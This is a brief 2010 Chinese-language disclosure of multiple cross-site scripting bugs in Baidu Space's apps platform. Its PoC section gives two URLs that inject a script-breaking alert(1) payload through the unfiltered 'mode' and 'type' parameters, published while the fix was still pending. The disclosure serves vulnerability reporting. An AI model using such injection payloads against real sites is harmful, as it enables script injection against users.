apps.hi.baidu multiple xss bugs

Author: xisigr
Blog: http://hi.baidu.com/xisigr/
Team: http://www.80vul.com
Date: 2010年9月6日

一 综述

apps.hi.baidu是百度空间的应用平台，多个变量在输出时没有过滤，直接导致多个xss漏洞。


二 分析

缺

三 PoC

http://apps.hi.baidu.com/dashan/show/list?mode=501762%22;alert%281%29;%3C/script%3E

http://apps.hi.baidu.com/points/data/myhistory/?type=200913%22;alert%281%29;%3C/script%3E


四 补丁[fix]

等待官方补丁